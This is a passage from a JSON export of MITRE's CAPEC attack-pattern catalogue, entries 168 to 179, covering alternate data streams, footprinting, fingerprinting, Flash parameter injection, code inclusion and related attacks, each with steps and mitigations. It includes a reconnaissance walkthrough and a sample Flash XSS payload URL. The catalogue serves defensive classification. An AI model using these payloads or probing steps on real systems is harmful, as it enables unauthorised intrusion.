Stream","Abstraction":"Detailed","Status":"Draft","Description":"An attacker exploits the functionality of Microsoft NTFS Alternate Data Streams (ADS) to undermine system security. ADS allows multiple \\"files\\" to be stored in one directory entry referenced as filename:streamname. One or more alternate data streams may be stored in any file or directory. Normal Microsoft utilities do not show the presence of an ADS stream attached to a file. The additional space for the ADS is not recorded in the displayed file size. The additional space for ADS is accounted for in the used space on the volume. An ADS can be any type of file. ADS are copied by standard Microsoft utilities between NTFS volumes. ADS can be used by an attacker or intruder to hide tools, scripts, and data from detection by normal system utilities. Many anti-virus programs do not check for or scan ADS. Windows Vista does have a switch (-R) on the command line DIR command that will display alternate streams.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"636"}},"Prerequisites":{"Prerequisite":"The target must be running the Microsoft NTFS file system."},"Resources_Required":{"Resource":"The attacker must have command line or programmatic access to the target\'s files system with write/read permissions."},"Mitigations":{"Mitigation":["Design: Use FAT file systems which do not support Alternate Data Streams.","Implementation: Use Vista dir with the -R switch or utility to find Alternate Data Streams and take appropriate action with those discovered.","Implementation: Use products that are Alternate Data Stream aware for virus scanning and system security operations."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"212"},{"CWE_ID":"69"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Windows alternate data stream"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Attack_Patterns, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"169":{"ID":"169","Name":"Footprinting","Abstraction":"Meta","Status":"Stable","Description":"An adversary engages in probing and exploration activities to identify constituents and properties of the target. Footprinting is a general term to describe a variety of information gathering techniques, often used by attackers in preparation for some attack. It consists of using tools to learn as much as possible about the composition, configuration, and security mechanisms of the targeted application, system or network. Information that might be collected during a footprinting effort could include open ports, applications and their versions, network topology, and similar information. Although similar to fingerprinting, footprinting aims to get a more holistic view of a system or network, whereas fingerprinting is more targeted to a specific application or operating system. While footprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.","Likelihood_Of_Attack":"High","Typical_Severity":"Very Low","Execution_Flow":{"Attack_Step":{"Step":"1","Phase":"Explore","Description":"[Request Footprinting] The attacker examines the website information and source code of the website and uses automated tools to get as much information as possible about the system and organization.","Technique":["Open Source Footprinting: Examine the website about the organization and skim through the webpage\'s HTML source to look for comments.","Network Enumeration: Perform various queries (Registrar Query, Organizational Query, Domain Query, Network Query, POC Query) on the many whois databases found on the internet to identify domain names and associated networks.","DNS Interrogation: Once basic information is gathered the attack could begin to query DNS.","Other Techniques: Use ping sweep, TCP scan, UDP scan, OS Identification various techniques to gain more information about the system and network."]}},"Prerequisites":{"Prerequisite":"An application must publicize identifiable information about the system or application through voluntary or involuntary means. Certain identification details of information systems are visible on communication networks (e.g., if an adversary uses a sniffer to inspect the traffic) due to their inherent structure and protocol standards. Any system or network that can be detected can be footprinted. However, some configuration choices may limit the useful information that can be collected during a footprinting attack."},"Skills_Required":{"Skill":["The adversary knows how to send HTTP request, run the scan tool.",{"Level":"Low"}]},"Resources_Required":{"Resource":"The adversary requires a variety of tools to collect information about the target. These include port/network scanners and tools to analyze responses from applications to determine version and configuration information. Footprinting a system adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Keep patches up to date by installing weekly or daily if possible.","Shut down unnecessary services/ports.","Change default passwords by choosing strong passwords.","Curtail unexpected input.","Encrypt and password-protect sensitive data.","Avoid including information that has the potential to identify and compromise your organization\'s security such as access to business plans, formulas, and proprietary documents."]},"Example_Instances":{"Example":"In this example let us look at the website http://www.example.com to get much information we can about Alice. From the website, we find that Alice also runs foobar.org. We type in www example.com into the prompt of the Name Lookup window in a tool, and our result is this IP address: 192.173.28.130 We type the domain into the Name Lookup prompt and we are given the same IP. We can safely say that example and foobar.org are hosted on the same box. But if we were to do a reverse name lookup on the IP, which domain will come up? www.example.com or foobar.org? Neither, the result is nijasvspirates.org. So nijasvspirates.org is the name of the box hosting 31337squirrel.org and foobar.org. So now that we have the IP, let\'s check to see if nijasvspirates is awake. We type the IP into the prompt in the Ping window. We\'ll set the interval between packets to 1 millisecond. We\'ll set the number of seconds to wait until a ping times out to 5. We\'ll set the ping size to 500 bytes and we\'ll send ten pings. Ten packets sent and ten packets received. nijasvspirates.org returned a message to my computer within an average of 0.35 seconds for every packet sent. nijasvspirates is alive. We open the Whois window and type nijasvspirates.org into the Query prompt, and whois.networksolutions.com into the Server prompt. This means we\'ll be asking Network Solutions to tell us everything they know about nijasvspirates.org. The result is this laundry list of info: Registrant: FooBar (nijasvspirates -DOM) p.o.box 11111 SLC, UT 84151 US Domain Name: nijasvspirates.ORG Administrative Contact, Billing Contact: Smith, John jsmith@anonymous.net FooBar p.o.box 11111 SLC, UT 84151 555-555-6103 Technical Contact: Johnson, Ken kj@fierymonkey.org fierymonkey p.o.box 11111 SLC, UT 84151 555-555-3849 Record last updated on 17-Aug-2001. Record expires on 11-Aug-2002. Record created on 11-Aug-2000. Database last updated on 12-Dec-2001 04:06:00 EST. Domain servers in listed order: NS1. fierymonkey.ORG 192.173.28.130 NS2. fierymonkey.ORG 64.192.168.80 A corner stone of footprinting is Port Scanning. Let\'s port scan nijasvspirates.org and see what kind of services are running on that box. We type in the nijasvspirates IP into the Host prompt of the Port Scan window. We\'ll start searching from port number 1, and we\'ll stop at the default Sub7 port, 27374. Our results are: 21 TCP ftp 22 TCP ssh SSH-1.99-OpenSSH_2.30 25 TCP smtp 53 TCP domain 80 TCP www 110 TCP pop3 111 TCP sunrpc 113 TCP ident Just by this we know that Alice is running a website and email, using POP3, SUNRPC (SUN Remote Procedure Call), and ident."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1217","Entry_Name":"Browser Bookmark Discovery"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1595","Entry_Name":"Active Scanning"}]},"References":{"Reference":[{"External_Reference_ID":"REF-31"},{"External_Reference_ID":"REF-32"},{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pp. 38-39"},{"External_Reference_ID":"REF-34","Section":"Section 3.1 Introduction, pg. 47"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"170":{"ID":"170","Name":"Web Application Fingerprinting","Abstraction":"Detailed","Status":"Draft","Description":"An attacker sends a series of probes to a web application in order to elicit version-dependent and type-dependent behavior that assists in identifying the target. An attacker could learn information such as software versions, error pages, and response headers, variations in implementations of the HTTP protocol, directory structures, and other similar information about the targeted service. This information can then be used by an attacker to formulate a targeted attack plan. While web application fingerprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.","Likelihood_Of_Attack":"High","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"541"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Request fingerprinting] Use automated tools or send web server specific commands to web server and wait for server\'s response.","Technique":"Use automated tools or send web server specific commands to web server and then receive server\'s response."},{"Step":"2","Phase":"Experiment","Description":"[Increase the accuracy of server fingerprinting of Web servers] Attacker usually needs to send several different commands to accurately identify the web server. Attacker can also use automated tools to send requests to the server. The responses of the server may be different in terms of protocol behavior.","Technique":["Observe the ordering of the several HTTP response headers. The ordering of the header of each server may have unique identities.","Send bad requests or requests of nonexistent pages to the server.","Attacker takes existing automated tools to recognize the type and the version of the web server in use."]},{"Step":"3","Phase":"Experiment","Description":"[Identify Web Application Software] After the web server platform software has been identified, the attacker start to identify web application technologies such as ASP, .NET, PHP and Java on the server.","Technique":["Examine the file name extensions in URL, for example .php indicates PHP script interfaced with Apache server.","Examine the HTTP Response Headers. This may leak information about software signatures","Examine Cookies that may contain server\'s software information.","Check error pages."]},{"Step":"4","Phase":"Experiment","Description":"[Identify Backend Database Version] Determining the database engine type can assist attackers\' attempt to successfully execute SQL injection. Some database API such as ODBC will show a database type as part of the driver information when reporting an error.","Technique":"Use tools to send bogus SQL query to the server and check error pages."}]},"Prerequisites":{"Prerequisite":"Any web application can be fingerprinted. However, some configuration choices can limit the useful information an attacker may collect during a fingerprinting attack."},"Skills_Required":{"Skill":["Attacker knows how to send HTTP request, SQL query to a web application.",{"Level":"Low"}]},"Resources_Required":{"Resource":"While simple fingerprinting can be accomplished with only a web browser, for more thorough fingerprinting an attacker requires a variety of tools to collect information about the target. These tools might include protocol analyzers, web-site crawlers, and fuzzing tools. Footprinting a service adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other","Note":"Information Leakage"}},"Mitigations":{"Mitigation":["Implementation: Obfuscate server fields of HTTP response.","Implementation: Hide inner ordering of HTTP response header.","Implementation: Customizing HTTP error codes such as 404 or 500.","Implementation: Hide URL file extension.","Implementation: Hide HTTP response header software information filed.","Implementation: Hide cookie\'s software information filed.","Implementation: Appropriately deal with error messages.","Implementation: Obfuscate database type in Database API\'s error message."]},"Example_Instances":{"Example":{"p":["An attacker sends malformed requests or requests of nonexistent pages to the server. Consider the following HTTP responses.","[REF-37]"],"div":[{"style":"margin-left:10px;","class":"informative","div":["Response from Apache 1.3.23",{"style":"color:#32498D; font-weight:bold;"}]},{"style":"margin-left:10px;","class":"informative","div":["Response from IIS 5.0",{"style":"color:#32498D; font-weight:bold;"}]}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"497"}},"References":{"Reference":[{"External_Reference_ID":"REF-36"},{"External_Reference_ID":"REF-37","Section":"Testing for Web Application Fingerprint (OWASP-IG-004)"},{"External_Reference_ID":"REF-38"},{"External_Reference_ID":"REF-39","Section":"WASC-45 - Fingerprinting"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"}]}},"173":{"ID":"173","Name":"Action Spoofing","Abstraction":"Meta","Status":"Stable","Description":"An adversary is able to disguise one action for another and therefore trick a user into initiating one type of action when they intend to initiate a different action. For example, a user might be led to believe that clicking a button will submit a query, but in fact it downloads software. Adversaries may perform this attack through social means, such as by simply convincing a victim to perform the action or relying on a user\'s natural inclination to do so, or through technical means, such as a clickjacking attack where a user sees one interface but is actually interacting with a second, invisible, interface.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Prerequisites":{"Prerequisite":["The adversary must convince the victim into performing the decoy action.","The adversary must have the means to control a user\'s interface to present them with a decoy action as well as the actual malicious action. Simple versions of this attack can be performed using web pages requiring only that the adversary be able to host (or control) content that the user visits."]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad."}},"Mitigations":{"Mitigation":["Avoid interacting with suspicious sites or clicking suspicious links.","An organization should provide regular, robust cybersecurity training to its employees."]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}]}},"174":{"ID":"174","Name":"Flash Parameter Injection","Abstraction":"Detailed","Status":"Draft","Description":"An adversary takes advantage of improper data validation to inject malicious global parameters into a Flash file embedded within an HTML document. Flash files can leverage user-submitted data to configure the Flash document and access the embedding HTML document. These \'FlashVars\' are most often passed to the Flash file via URL arguments or from the Object or Embed tag within the embedding HTML document. If these FlashVars are not properly sanitized, an adversary may be able to embed malicious content (such as scripts) into the HTML document. The injected parameters can also provide the adversary control over other objects within the Flash file as well as full control over the parent document\'s DOM model. As such, this is a form of HTTP parameter injection, but the abilities granted to the Flash document (such as access to a page\'s document model, including associated cookies) make this attack more flexible. Flash Parameter Injection attacks can also preface further attacks such as various forms of Cross-Site Scripting (XSS) attacks in addition to Session Hijacking attacks.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"182","Exclude_Related":{"Exclude_ID":"403"}},{"Nature":"CanAlsoBe","CAPEC_ID":"460"},{"Nature":"CanPrecede","CAPEC_ID":"63"},{"Nature":"CanPrecede","CAPEC_ID":"178"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Spider] Using a browser or an automated tool, an adversary records all instances of HTML documents that have embedded Flash files. If there is an embedded Flash file, they list how to pass global parameters to the Flash file from the embedding object.","Technique":["Use an automated tool to record all instances of URLs which have embedded Flash files and list the parameters passing to the Flash file.","Use a browser to manually explore the website to see whether the HTML document has embedded Flash files or not and list the parameters passing to the Flash file."]},{"Step":"2","Phase":"Experiment","Description":"[Determine the application susceptibility to Flash parameter injection] Determine the application susceptibility to Flash parameter injection. For each URL identified in the Explore phase, the adversary attempts to use various techniques such as DOM based, reflected, flashvars, and persistent attacks depending on the type of parameter passed to the embedded Flash file.","Technique":["When the JavaScript \'document.location\' variable is used as part of the parameter, inject \'#\' and the payload into the parameter in the URL.","When the name of the Flash file is exposed as a form or a URL parameter, the attacker injects \'?\' and the payload after the file name in the URL to override some global value.","When the arguments passed in the \'flashvars\' attributes, the attacker injects \'&\' and payload in the URL.","If some of the attributes of the <object> tag are received as parameters, the \'flashvars\' attribute is injected into the <object> tag without the creator of the Web page ever intending to allow arguments to be passed into the Flash file.","If shared objects are used to save data that is entered by the user persistent Flash parameter injection may occur, with malicious code being injected into the Flash file and executed, every time the Flash file is loaded."]},{"Step":"3","Phase":"Exploit","Description":"[Execute Flash Parameter Injection Attack] Inject parameters into Flash file. Based on the results of the Experiment phase, the adversary crafts the underlying malicious URL containing injected Flash parameters and submits it to the web server. Once the web server receives the request, the embedding HTML document will controllable by the adversary.","Technique":"Craft underlying malicious URL and send it to the web server to take control of the embedding HTML document."}]},"Skills_Required":{"Skill":["The attacker need inject values into the global parameters to the Flash file and understand the parent HTML document DOM structure. The attacker needs to be smart enough to convince the victim to click on their crafted link.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"The attacker must convince the victim to click their crafted link."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other","Note":"Information Leakage"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":"User input must be sanitized according to context before reflected back to the user. The JavaScript function \'encodeURI\' is not always sufficient for sanitizing input intended for global Flash parameters. Extreme caution should be taken when saving user input in Flash cookies. In such cases the Flash file itself will need to be fixed and recompiled, changing the name of the local shared objects (Flash cookies)."},"Example_Instances":{"Example":{"p":["The following are examples for different types of parameters passed to the Flash file.","If an unsuspecting user is lured by an attacker to click on link like this: http://example.com/vulnerable.swf?flashfile=javascript:alert(document.domain)","The result will be not merely a one-time execution of the JavaScript code in the victim\'s browser in the context of the domain with the vulnerable Flash file, but every time the Flash is loaded, whether by direct reference or embedded inside the same domain, the JavaScript will be executed again."],"div":[{"style":"margin-left:10px;","div":["DOM-based Flash parameter injection",{"style":"color:#32498D; font-weight:bold;"},"<object>",{"style":"margin-left:10px;","div":["<embed src=\\"myFlash.swf\\" flashvars=\\"location=http://example.com/index.htm#&globalVar=e-v-i-l\\"></embed>",{"style":"margin-left:10px;"}]}]},{"style":"margin-left:10px;","class":"informative","div":["Passing parameter in an embedded URI",{"style":"color:#32498D; font-weight:bold;"}]},{"style":"margin-left:10px;","class":"informative","div":["Passing parameter in flashvars",{"style":"color:#32498D; font-weight:bold;"}]},{"style":"margin-left:10px;","class":"informative","div":["Persistent Flash Parameter Injection",{"style":"color:#32498D; font-weight:bold;"},{"i":"// Create a new shared object or read an existing one"},{"style":"margin-left:10px;","div":[{"i":"// Check whether there is a shared object saved"},{"style":"margin-left:10px;","div":{"i":"// Set a default"}},{"style":"margin-left:10px;","div":{"i":"// Read the flash file to load from the shared object"}}]},{"i":"// Store the flash file\'s name in the shared object"},{"i":"// Load the flash file"}]}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"88"}},"References":{"Reference":[{"External_Reference_ID":"REF-40"},{"External_Reference_ID":"REF-560"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Phases, Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Description, Example_Instances, Execution_Flow, References, Related_Attack_Patterns, Related_Weaknesses, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Skills_Required"}]}},"175":{"ID":"175","Name":"Code Inclusion","Abstraction":"Meta","Status":"Stable","Description":"An adversary exploits a weakness on the target to force arbitrary code to be retrieved locally or from a remote location and executed. This differs from code injection in that code injection involves the direct inclusion of code while code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Very High","Prerequisites":{"Prerequisite":["The target application must include external code/libraries that are executed when the application runs and the adversary must be able to influence the specific files that get included.","The victim must run the targeted application, possibly using the crafted parameters that the adversary uses to identify the code to include."]},"Resources_Required":{"Resource":"The adversary may need the capability to host code modules if they wish their own code files to be included."},"Example_Instances":{"Example":"One example of this type of attack pattern is PHP file include attacks where the parameter of an include() function is set by a variable that an attacker is able to control. The result is that arbitrary code could be loaded into the PHP application and executed."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"829"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Prerequisites, Description Summary, Examples-Instances, Injection_Vector, Payload, Payload_Activation_Impact, Related_Weaknesses, Resources_Required, Typical_Likelihood_of_Exploit"}}},"176":{"ID":"176","Name":"Configuration/Environment Manipulation","Abstraction":"Meta","Status":"Draft","Description":"An attacker manipulates files or settings external to a target application which affect the behavior of that application. For example, many applications use external configuration files and libraries - modification of these entities or otherwise affecting the application\'s ability to use them would constitute a configuration/environment manipulation attack.","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The target application must consult external files or configuration controls to control its execution. All but the very simplest applications meet this requirement."},"Resources_Required":{"Resource":"The attacker must have the access necessary to affect the files or other environment items the targeted application uses for its operations."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"15"},{"CWE_ID":"1233"},{"CWE_ID":"1234"},{"CWE_ID":"1304"},{"CWE_ID":"1328"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Setting Manipulation"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Configuration/Environment manipulation",{"Date":"2015-11-09"}]}},"177":{"ID":"177","Name":"Create files with the same name as files protected with a higher classification","Abstraction":"Detailed","Status":"Draft","Description":"An attacker exploits file location algorithms in an operating system or application by creating a file with the same name as a protected or privileged file. The attacker could manipulate the system if the attacker-created file is trusted by the operating system or an application component that attempts to load the original file. Applications often load or include external files, such as libraries or configuration files. These files should be protected against malicious manipulation. However, if the application only uses the name of the file when locating it, an attacker may be able to create a file with the same name and place it in a directory that the application will search before the directory with the legitimate file is searched. Because the attackers\' file is discovered first, it would be used by the target application. This attack can be extremely destructive if the referenced file is executable and/or is granted special privileges based solely on having a particular name.","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"17"}},"Prerequisites":{"Prerequisite":["The target application must include external files. Most non-trivial applications meet this criterion.","The target application does not verify that a located file is the one it was looking for through means other than the name. Many applications fail to perform checks of this type.","The directories the target application searches to find the included file include directories writable by the attacker which are searched before the protected directory containing the actual files. It is much less common for applications to meet this criterion, but if an attacker can manipulate the application\'s search path (possibly by controlling environmental variables) then they can force this criterion to be met."]},"Resources_Required":{"Resource":"The attacker must have sufficient access to place an arbitrarily named file somewhere early in the application\'s search path."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"706"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1036","Entry_Name":"Masquerading"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, References, Related_Attack_Patterns, Related_Weaknesses"}]}},"178":{"ID":"178","Name":"Cross-Site Flashing","Abstraction":"Detailed","Status":"Draft","Description":"An attacker is able to trick the victim into executing a Flash document that passes commands or calls to a Flash player browser plugin, allowing the attacker to exploit native Flash functionality in the client browser. This attack pattern occurs where an attacker can provide a crafted link to a Flash document (SWF file) which, when followed, will cause additional malicious instructions to be executed. The attacker does not need to serve or control the Flash document. The attack takes advantage of the fact that Flash files can reference external URLs. If variables that serve as URLs that the Flash application references can be controlled through parameters, then by creating a link that includes values for those parameters, an attacker can cause arbitrary content to be referenced and possibly executed by the targeted Flash application.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"182"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identification] Using a browser or an automated tool, an attacker records all instances of URLs (or partial URL such as domain) passed to a flash file (SWF).","Technique":["Use an automated tool to record the variables passed to a flash file.","Use a browser to manually explore the website and analyze how the flash file receive variables, e.g. JavaScript using SetVariable/GetVariable, HTML FlashVars param tag, etc.","Use decompilers to retrieve the flash source code and record all user-controllable variables passed to a loadMovie* directive."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt to inject a remote flash file] The attacker makes use of a remotely available flash file (SWF) that generates a uniquely identifiable output when executed inside the targeted flash file.","Technique":"Modify the variable of the SWF file that contains the remote movie URL to the attacker controlled flash file."},{"Step":"3","Phase":"Exploit","Description":"[Access or Modify Flash Application Variables] As the attacker succeeds in exploiting the vulnerability, they target the content of the flash application to steal variable content, password, etc.","Technique":["Develop malicious Flash application that is injected through vectors identified during the Experiment Phase and loaded by the victim browser\'s flash plugin and sends document information to the attacker.","Develop malicious Flash application that is injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the flash application to execute appropriately."]},{"Step":"4","Phase":"Exploit","Description":"[Execute JavaScript in victim\'s browser] When the attacker targets the current flash application, they can choose to inject JavaScript in the client\'s DOM and therefore execute cross-site scripting attack.","Technique":"Develop malicious JavaScript that is injected from the rogue flash movie to the targeted flash application through vectors identified during the Experiment Phase and loaded by the victim\'s browser."}]},"Prerequisites":{"Prerequisite":"The targeted Flash application must reference external URLs and the locations thus referenced must be controllable through parameters. The Flash application must fail to sanitize such parameters against malicious manipulation. The victim must follow a crafted link created by the attacker."},"Skills_Required":{"Skill":["knowledge of Flash internals, parameters and remote referencing.",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Implementation: Only allow known URL to be included as remote flash movies in a flash application","Configuration: Properly configure the crossdomain.xml file to only include the known domains that should host remote flash movies."]},"Example_Instances":{"Example":"The attacker tries to get their malicious flash movie to be executed in the targeted flash application. The malicious file is hosted on the attacker.com domain and the targeted flash application is hosted on example.com The crossdomain.xml file in the root of example.com allows all domains and no specific restriction is specified in the targeted flash application. When the attacker injects their malicious file in the vulnerable flash movie, the rogue flash application is able to access internal variables and parameter of the flash movie."},"References":{"Reference":[{"External_Reference_ID":"REF-41"},{"External_Reference_ID":"REF-42","Section":"Testing for Cross site flashing"},{"External_Reference_ID":"REF-561"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"}]}},"179":{"ID":"179","Name":"Calling Micro-Services Directly","Abstraction":"Standard","Status":"Draft","Description":"An attacker is able to discover and query Micro-services at a web location and thereby expose the Micro-services to further exploitation by gathering information about their implementation and function. Micro-services in web pages allow portions of a page to connect to the server and update content without needing to cause the entire page to update. This allows user activity to change portions of the page more quickly without causing disruptions elsewhere. However, these micro-services may not be subject to the same level of security review as other forms of content. For example, a micro-service that posts requests to a server that are turned into SQL queries may not adequately protect against 